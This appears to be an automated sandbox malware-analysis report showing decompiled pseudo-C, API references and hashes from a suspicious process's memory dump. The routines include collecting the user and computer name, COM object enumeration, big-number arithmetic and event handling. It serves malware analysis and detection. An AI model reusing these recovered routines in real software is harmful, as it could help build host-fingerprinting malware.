Part of subcall function 02B85B0E: lstrlenW.KERNEL32(?,?,?,02B84E5D,3D02B890,80000002,02B86A76,02B857D1,74666F53,4D4C4B48,02B857D1,?,3D02B890,80000002,02B86A76,?), ref: 02B85B33

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

lstrcpy.KERNEL32(?,00000000), ref: 02B84D16

Strings

\, xrefs: 02B84CFA
(, xrefs: 02B84D77

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 67aae984c9feec27256cafb806cb36c65b9869845a862a9dd592c3b2368f38ac
Instruction ID: b9dd6380c77797fdd7f5e8bec4f52e879421cc64a7b9f47bc2e9073b919b3d14
Opcode Fuzzy Hash: 67aae984c9feec27256cafb806cb36c65b9869845a862a9dd592c3b2368f38ac
Instruction Fuzzy Hash: B2515A7250020AEFDF21BF60DD40EAB7BBAEF08355F108999FA1996160E731D925EF10

Uniqueness

Uniqueness Score: -1.00%

Function 02B81340 Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B81340() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x7625e912
						_v12 = _v12 + _t11;
						_t64 = E02B833DC(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02B861DA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2b83e01
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02b8134e
0x02b81351
0x02b81354
0x02b8135a
0x02b8135f
0x02b81365
0x02b8136d
0x02b81370
0x02b81376
0x02b8137b
0x02b81384
0x02b81388
0x02b81395
0x02b81399
0x02b8139b
0x02b8139f
0x02b813a2
0x02b813b2
0x02b81405
0x02b81406
0x02b813b4
0x02b813b9
0x02b813ba
0x02b813bf
0x02b813c2
0x02b813d5
0x00000000
0x02b813d7
0x02b813da
0x02b813df
0x02b813ed
0x02b813f0
0x02b813f6
0x02b813fb
0x00000000
0x02b813fd
0x02b813fd
0x02b81400
0x02b81400
0x02b813fb
0x02b813d5
0x02b8140b
0x02b8140c
0x02b8137b
0x02b81412

APIs

GetUserNameW.ADVAPI32(00000000,02B83DFF), ref: 02B81354
GetComputerNameW.KERNEL32(00000000,02B83DFF), ref: 02B81370

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

GetUserNameW.ADVAPI32(00000000,02B83DFF), ref: 02B813AA
GetComputerNameW.KERNEL32(02B83DFF,7625E910), ref: 02B813CD
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02B83DFF,00000000,02B83E01,00000000,00000000,?,7625E910,02B83DFF), ref: 02B813F0

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: a4cfd81345b316b5bca651b3648752c53962865ebf04c059c40adf57ca8003eb
Instruction ID: c962d17d5b70fc3b9717242867269d8cb39dbf25f6afe8417db48a2bcb64b10d
Opcode Fuzzy Hash: a4cfd81345b316b5bca651b3648752c53962865ebf04c059c40adf57ca8003eb
Instruction Fuzzy Hash: 2E21D876901108FFCB11EFE9D9849EEBBBCEF44244B1444AAE50AE7240DB30AB45DB10

Uniqueness

Uniqueness Score: -1.00%

Function 02B86CDF Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02B86CDF(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2b8a348; // 0x29fd5b8
					_t5 = _t103 + 0x2b8b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2b89284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2b8a348; // 0x29fd5b8
												_t28 = _t109 + 0x2b8b0e4; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2b8a348; // 0x29fd5b8
														_t33 = _t79 + 0x2b8b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02b86ce4
0x02b86ced
0x02b86cee
0x02b86cf2
0x02b86cf8
0x02b86cfe
0x02b86d07
0x02b86d0d
0x02b86d17
0x02b86d19
0x02b86d1f
0x02b86d24
0x02b86d2f
0x02b86d35
0x02b86d3a
0x02b86e5c
0x02b86d40
0x02b86d40
0x02b86d4d
0x02b86d53
0x02b86d59
0x02b86d5d
0x02b86d63
0x02b86d70
0x02b86d74
0x02b86d7a
0x02b86d7d
0x02b86d85
0x02b86d86
0x02b86d8a
0x02b86d8e
0x02b86d91
0x02b86d94
0x02b86d9a
0x02b86da3
0x02b86da9
0x02b86daa
0x02b86dad
0x02b86dae
0x02b86daf
0x02b86db7
0x02b86db8
0x02b86db9
0x02b86dbb
0x02b86dbf
0x02b86dc3
0x00000000
0x00000000
0x02b86dc9
0x02b86dd2
0x02b86dd8
0x02b86de2
0x02b86de6
0x02b86de8
0x02b86df5
0x02b86df9
0x02b86e01
0x02b86e06
0x02b86e18
0x02b86e1a
0x02b86e20
0x02b86e20
0x02b86e29
0x02b86e29
0x02b86e2b
0x02b86e31
0x02b86e31
0x02b86e34
0x02b86e3a
0x02b86e3d
0x02b86e46
0x00000000
0x00000000
0x00000000
0x02b86e46
0x02b86d9a
0x02b86d94
0x02b86d7d
0x02b86e4c
0x02b86e4c
0x02b86e52
0x02b86e52
0x02b86e58
0x02b86e58
0x02b86e61
0x02b86e67
0x02b86e67
0x02b86d24
0x02b86e70

APIs

SysAllocString.OLEAUT32(02B89284), ref: 02B86D2F
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02B86E10
SysFreeString.OLEAUT32(00000000), ref: 02B86E29
SysFreeString.OLEAUT32(?), ref: 02B86E58

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: c9773c747d29b5d21288d2c74a0a66672ff9c1b6020cfd48900e5b589c4d38ac
Instruction ID: d5e393b7f2d7ed8c41c34bb41269dd0f58fd6523d60a39c6b9b1152c293762a5
Opcode Fuzzy Hash: c9773c747d29b5d21288d2c74a0a66672ff9c1b6020cfd48900e5b589c4d38ac
Instruction Fuzzy Hash: 4D514076D00609EFCB11EFA8C888DAEB7BAFF88705B154595E919EB310D7319D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02B859B8
SysFreeString.OLEAUT32(00000000), ref: 02B85A9D

Part of subcall function 02B86CDF: SysAllocString.OLEAUT32(02B89284), ref: 02B86D2F

SafeArrayDestroy.OLEAUT32(00000000), ref: 02B85AF0
SysFreeString.OLEAUT32(00000000), ref: 02B85AFF

Part of subcall function 02B877E3: Sleep.KERNEL32(000001F4), ref: 02B8782B

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 6bcc0b87e14ccfe289d15dad24b170b12cb89623b504ab3dc9845f8595f3dd19
Instruction ID: 8b7461bf791581071d5aefc515d8334a2ada24e304812e4b8f9f325de0ecc4f3
Opcode Fuzzy Hash: 6bcc0b87e14ccfe289d15dad24b170b12cb89623b504ab3dc9845f8595f3dd19
Instruction Fuzzy Hash: F651D475900609AFCB11EFA8C884ADEB7B6FF88744F258869E519DB210DB31DD49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B84781 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02B84781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02B861EF(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02B86725(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02B87477(_t101,  &_v428, _a8, _t96 - _t81);
					E02B87477(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02B86725(_t101,  &E02B8A1D0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02B86725(_a16, _a4);
						E02B87894(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02B882DA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02B882D4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02B85F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02B86E71(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02B810A0(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E02B8A1D0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02b84784
0x02b84790
0x02b84796
0x02b8479b
0x02b8479f
0x02b84911
0x02b84915
0x02b84915
0x02b847a5
0x02b847a9
0x02b847ad
0x02b847b0
0x02b847bb
0x02b847c1
0x02b847c6
0x02b847c9
0x02b847e3
0x02b847f2
0x02b847fe
0x02b84808
0x02b8480d
0x02b8480f
0x02b84812
0x02b848c9
0x02b848cf
0x02b848e0
0x02b848f3
0x02b84909
0x00000000
0x02b8490e
0x02b8481b
0x02b84822
0x02b84826
0x02b8482c
0x02b8482e
0x02b84830
0x02b84832
0x02b84834
0x02b8483e
0x02b84843
0x02b84845
0x02b84847
0x02b84848
0x02b84849
0x02b8484a
0x02b84851
0x02b84858
0x02b8485b
0x02b8485b
0x02b84828
0x02b84828
0x02b84828
0x02b84863
0x02b8486b
0x02b84877
0x02b8487c
0x02b8487c
0x02b84881
0x00000000
0x00000000
0x02b84883
0x02b84886
0x02b84893
0x00000000
0x00000000
0x02b84895
0x02b84895
0x02b848a2
0x02b8487c
0x02b84881
0x00000000
0x00000000
0x00000000
0x02b84881
0x02b848ac
0x02b848af
0x02b848b2
0x02b848b9
0x02b848b9
0x02b848c6
0x00000000
0x02b848c6
0x02b847b2
0x02b847b6
0x02b847b7
0x02b847b9
0x00000000
0x00000000
0x00000000
0x02b847b9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02B84834
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02B8484A
memset.NTDLL ref: 02B848F3
memset.NTDLL ref: 02B84909

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 504ab7fd321d69ad343e967f06900b49f9855be450d324e2e3fb447220f9b63f
Instruction ID: 0f1e8aefde1f6b5a02699f7c72c78134cc877c7dea016bf034bd2029550834d0
Opcode Fuzzy Hash: 504ab7fd321d69ad343e967f06900b49f9855be450d324e2e3fb447220f9b63f
Instruction Fuzzy Hash: 6641A131A0125AAFDB10BF68CC40BEE7776EF45310F1045A9E91DA7280EB70AE44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B8454F Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E02B8454F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x2b8a160() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x2b8a174(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E02B833DC(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x2b8a160() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E02B861DA(_v16);
							if(_t58 == 0) {
								_t58 = E02B82B18(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E02B816B2( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E02B816B2( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x02b8454f
0x02b8455e
0x02b84563
0x02b84565
0x02b8456a
0x02b8456b
0x02b84570
0x02b84571
0x02b8457c
0x02b845ad
0x02b845b2
0x02b84675
0x02b84678
0x02b8467e
0x02b8467e
0x02b845bf
0x02b845c7
0x02b84672
0x00000000
0x02b84672
0x02b845d2
0x02b845d7
0x02b845dc
0x02b84664
0x02b84665
0x02b84665
0x02b8466b
0x00000000
0x02b8466b
0x02b845e2
0x02b845e4
0x02b845ea
0x02b845eb
0x02b845eb
0x02b845ee
0x02b845f1
0x02b845f7
0x02b845fc
0x02b845fd
0x02b84602
0x02b84605
0x02b84610
0x00000000
0x00000000
0x02b84618
0x02b84620
0x02b84649
0x02b8464c
0x02b84653
0x02b8465e
0x02b8465e
0x00000000
0x02b84653
0x02b8462c
0x02b84630
0x00000000
0x00000000
0x02b84632
0x02b84637
0x00000000
0x00000000
0x02b84639
0x02b84639
0x02b8463e
0x00000000
0x00000000
0x02b84640
0x02b84641
0x02b84644
0x02b84644
0x02b845eb
0x02b84584
0x02b8458c
0x02b845a5
0x02b845a7
0x00000000
0x00000000
0x00000000
0x02b845a7
0x02b84598
0x02b8459c
0x00000000
0x00000000
0x02b845a2
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 02B84565
GetLastError.KERNEL32 ref: 02B8457E

Part of subcall function 02B816B2: WaitForMultipleObjects.KERNEL32(00000002,02B87C47,00000000,02B87C47,?,?,?,02B87C47,0000EA60), ref: 02B816CD

ResetEvent.KERNEL32(?), ref: 02B845F7
GetLastError.KERNEL32 ref: 02B84612

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 73fd6970eff620f9e143a3bc60f59725d3b224a25823ef2dc6d9afd48ecde4d2
Instruction ID: 8c215e4c032c00949bff1ebdba3b5e2238f8389b42c178f696b51e7bb6f70c13
Opcode Fuzzy Hash: 73fd6970eff620f9e143a3bc60f59725d3b224a25823ef2dc6d9afd48ecde4d2
Instruction Fuzzy Hash: C031A032A40605EBCB21BFA5CC44B6EB7BAFF84354B104AE8E559A7190EB30E945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02B849D0 Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02B849D0(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2b8a310; // 0x7aca9d57
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2b8a348; // 0x29fd5b8
				_t3 = _t8 + 0x2b8b7b4; // 0x61636f4c
				_t25 = 0;
				_t30 = E02B874EC(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2b8a34c, 1, 0, _t30);
					E02B861DA(_t30);
				}
				_t12 =  *0x2b8a2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02B830D5() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02B837DF(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2b8a124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02B823C4(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02b849d1
0x02b849d8
0x02b849e2
0x02b849e6
0x02b849ec
0x02b849fb
0x02b84a02
0x02b84a06
0x02b84a18
0x02b84a1a
0x02b84a1a
0x02b84a1f
0x02b84a26
0x02b84a7d
0x02b84a7d
0x02b84a83
0x02b84a85
0x02b84a85
0x02b84a8f
0x02b84a93
0x02b84aa5
0x02b84aa5
0x02b84aa9
0x02b84aaf
0x02b84aaf
0x00000000
0x02b84a3f
0x02b84a44
0x02b84a4c
0x02b84a50
0x02b84a54
0x02b84a54
0x02b84a61
0x02b84a65
0x02b84a69
0x02b84abe
0x02b84ac4
0x02b84ac4
0x02b84a77
0x02b84a7b
0x02b84ab2
0x02b84ab4
0x02b84ab7
0x02b84ab7
0x00000000
0x02b84ab4
0x02b84a7b
0x00000000
0x02b84a65

APIs

Part of subcall function 02B874EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,05589E08,00000000,?,?,43175AC3,00000005,02B8A00C,4D283A53,?,?), ref: 02B87522
Part of subcall function 02B874EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02B87546
Part of subcall function 02B874EC: lstrcat.KERNEL32(00000000,00000000), ref: 02B8754E

CreateEventA.KERNEL32(02B8A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02B86A95,?,?,?), ref: 02B84A11

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

WaitForSingleObject.KERNEL32(00000000,00004E20,02B86A95,00000000,00000000,?,00000000,?,02B86A95,?,?,?), ref: 02B84A71
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02B86A95,?,?,?), ref: 02B84A9F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02B86A95,?,?,?), ref: 02B84AB7

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: eab17a144830b099e82c228e08223679bbd07d08125f1e210e46cac9def542ac
Instruction ID: 65bb1eafe4aa308dd4b3d4843535af7e40062333ca9bf761b08756738f2b957e
Opcode Fuzzy Hash: eab17a144830b099e82c228e08223679bbd07d08125f1e210e46cac9def542ac
